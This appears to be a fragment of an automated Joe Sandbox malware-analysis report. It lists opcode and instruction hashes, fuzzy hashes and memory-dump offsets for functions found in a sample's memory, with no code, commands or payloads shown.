                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: abc79a5b53a65e98ad35d96f3b37db6fd806af5d85264f7ca64063c96f936b7a
                                                                                                                                                                                                                                            • Instruction ID: 907c3c61c5810ee696c62c1cab8d940b001b578e4ff67ce03370268967ba8666
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: abc79a5b53a65e98ad35d96f3b37db6fd806af5d85264f7ca64063c96f936b7a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2FD05E357002249B8A15276DF4288BE3BAFEEC5621704046AE60BC7350DF6AAC0A47E9
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c580a2bd1e713a8cf630a158c30243b59150a3b7403b4758c752b7b4a6b1569b
                                                                                                                                                                                                                                            • Instruction ID: 4771b370abc9f8f223605f909fe44b3b4d627c06dde01973a07a4ed270a9aca3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c580a2bd1e713a8cf630a158c30243b59150a3b7403b4758c752b7b4a6b1569b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42E0DFB8A04A844FEB45DB38F429B867B72AFC430CF05C05AC0818778AEB3C9801CB05
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 4907511c37b19bd3e93b3d9403e7807a926d0bdd6c1e52082a7cf866d7bcbceb
                                                                                                                                                                                                                                            • Instruction ID: 93b357882f0c714939ffb6e38d3c06e3405aafeaf58b74c7c70e0892505d3119
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4907511c37b19bd3e93b3d9403e7807a926d0bdd6c1e52082a7cf866d7bcbceb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43E092B4D0420D9F8B84DFA9D4415BEBFF4AB48300F10816AD918E2240E6345A51CFD5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 64d454556124061e9bf80008b119cffd10739b626711fc8302930b6ce17b0a20
                                                                                                                                                                                                                                            • Instruction ID: 723fe517a298b5fdfde628c4aff2352f470d63f1d57bc60c6bc5b02d1e6804b3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64d454556124061e9bf80008b119cffd10739b626711fc8302930b6ce17b0a20
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7D05E716593908FCB2B177564381683F30DA4728A31808D7D049CBAD7CA294C02C792
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e00e22f74768f7ac0a2b123502b4b495172cc6ffcf759e9cbc9da19f15b1ecd7
                                                                                                                                                                                                                                            • Instruction ID: 4c364e8f4ed462ca29d82046697f4aea969d88db37aa7a193ed6f1a56e05c0ed
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e00e22f74768f7ac0a2b123502b4b495172cc6ffcf759e9cbc9da19f15b1ecd7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5D05E71C9A3849ECB128FB4B95A7FD7F30EF43315F28069AC84496142D765451ADB14
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e41fb194059fb978c1ab64af0bffc1b80744ac540e10562e95e9b5923c71f087
                                                                                                                                                                                                                                            • Instruction ID: eac25f9d0d3b07924a3a1504d0841ebed825403b6f94c8aa8e272780a492ac1a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e41fb194059fb978c1ab64af0bffc1b80744ac540e10562e95e9b5923c71f087
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07D0A72575D1901FC602133C35200B82BF7DFCAC1530A40EBD591D33E7DC445C0647A6
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: bfa2e9141f2657181cc9b7688c1688eff81fc1514f339a34d5db876c67279ef1
                                                                                                                                                                                                                                            • Instruction ID: 8467381e637adfb803cd68b8530167e262e58a34a6104e5943cafd63fd3d9900
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bfa2e9141f2657181cc9b7688c1688eff81fc1514f339a34d5db876c67279ef1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1D012326043286B9745EAAD54105DEBFAEDE84374B01806ED50DD7740ED76794443D9
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c9add8de916486d4cb2568362f455f4023d4d75032c5c59fbdfbf968f085a27a
                                                                                                                                                                                                                                            • Instruction ID: 8b47829ab95c19a80c62dcf3ed21716a34f586fb316a4ab71da7607b441e4d04
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9add8de916486d4cb2568362f455f4023d4d75032c5c59fbdfbf968f085a27a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87D05E32218648AFC7419B54C810C403F76BF0A62030040EAF6408F233E372E820DB44
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 334afe822916554c21537c09dc274027e933234694458fb01ad3ac324042178b
                                                                                                                                                                                                                                            • Instruction ID: a85c374ad3025f9ca441798c8631b4982cef5a10fc540709ec736d247b828e8f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 334afe822916554c21537c09dc274027e933234694458fb01ad3ac324042178b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39C08070C613089FCB109FF9B409B7A7B7CEF03305F501A54D80853100D7714414D56D
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 20d71adae8aecb7b844f51e3df8c2fae2e4cbe1cd60c9f7e9dc8ae199d82163e
                                                                                                                                                                                                                                            • Instruction ID: 876ff79c9b36e75541723c1fcb15f87d73694abe15b667c72620603258d1dc3a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20d71adae8aecb7b844f51e3df8c2fae2e4cbe1cd60c9f7e9dc8ae199d82163e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1FB092D2C581413FFB43026428A60D0BF60E86622573202C9C14293602A00A8A0B8663
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: dab7553a5e8362ef200b9bff5488d460f88ed54554677e36d999e9e31e4fa160
                                                                                                                                                                                                                                            • Instruction ID: 3e5a1607690d3c9d6058c28f4e4a0c525eb0313b590a16b73b723da6ba5228d7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dab7553a5e8362ef200b9bff5488d460f88ed54554677e36d999e9e31e4fa160
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1EB012B2B4402C4B0A81F3A8B5342DC7255E7841923504126D10EC5B90EF1598134388
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%